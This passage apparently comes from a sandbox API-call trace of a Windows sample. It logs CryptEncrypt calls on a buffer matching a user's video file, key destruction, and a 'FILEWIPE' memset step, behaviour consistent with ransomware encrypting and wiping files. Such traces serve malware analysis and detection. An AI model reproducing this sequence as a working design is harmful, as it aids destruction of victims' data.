lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.766] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0043.766] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.766] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.766] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.766] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0043.766] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.766] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0043.766] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.767] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.767] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x12854, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x12860) returned 1 [0043.767] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.767] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0043.767] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.767] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.767] CharLowerBuffW (in: lpsz="byte[75873]", cchLength=0xb | out: lpsz="byte[75873]") returned 0xb [0043.767] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.768] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.768] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.769] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.769] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.769] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x95a0c8*, pdwDataLen=0x6ae220*=0x12854, dwBufLen=0x12860 | out: pbData=0x95a0c8*, pdwDataLen=0x6ae220*=0x12860) returned 1 [0043.769] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.769] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0043.769] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.769] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.770] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.770] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.770] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0043.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.770] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.770] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.770] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.770] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0043.770] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.770] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.770] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0043.770] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.770] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0043.770] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.777] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.777] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.777] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.779] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.779] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.779] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0043.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.779] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.779] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.780] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0043.780] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.780] CryptDestroyKey (hKey=0x7c2280) returned 1 [0043.780] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.780] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.780] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0043.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.780] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.780] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.780] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0043.781] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0043.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0043.781] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.781] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.781] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0043.781] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0043.781] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.781] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.781] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.781] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.781] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0043.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.781] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.781] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.781] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.781] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0043.781] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.782] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0043.782] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0043.782] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.782] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0043.782] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0043.782] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0043.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0043.782] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0043.782] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.782] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0043.782] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.782] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.782] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0043.782] FreeLibrary (hLibModule=0x754b0000) returned 1 [0043.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0043.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0043.782] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0043.782] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0043.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.783] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.785] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.785] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.785] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.785] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0043.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0043.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.786] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.786] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.786] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9c13a20, ftCreationTime.dwHighDateTime=0x1d5b7f0, ftLastAccessTime.dwLowDateTime=0xdc131530, ftLastAccessTime.dwHighDateTime=0x1d5bf98, ftLastWriteTime.dwLowDateTime=0xdc131530, ftLastWriteTime.dwHighDateTime=0x1d5bf98, nFileSizeHigh=0x0, nFileSizeLow=0x12854, dwReserved0=0x0, dwReserved1=0x777648, cFileName="u373x4noWFcnJ.mp4", cAlternateFileName="U373X4~1.MP4")) returned 0x7c2100 [0043.786] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0043.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0043.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0043.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0043.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.786] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.786] CharLowerBuffW (in: lpsz="byte[75860]", cchLength=0xb | out: lpsz="byte[75860]") returned 0xb [0043.787] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.787] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0043.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0043.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.787] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.787] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0043.787] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0043.787] FreeLibrary (hLibModule=0x76b40000) returned 1 [0043.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0043.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0043.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0043.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0043.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0043.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0043.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0043.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0043.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0043.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0043.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0043.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0043.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0043.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0043.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0043.788] HeapFree (in: 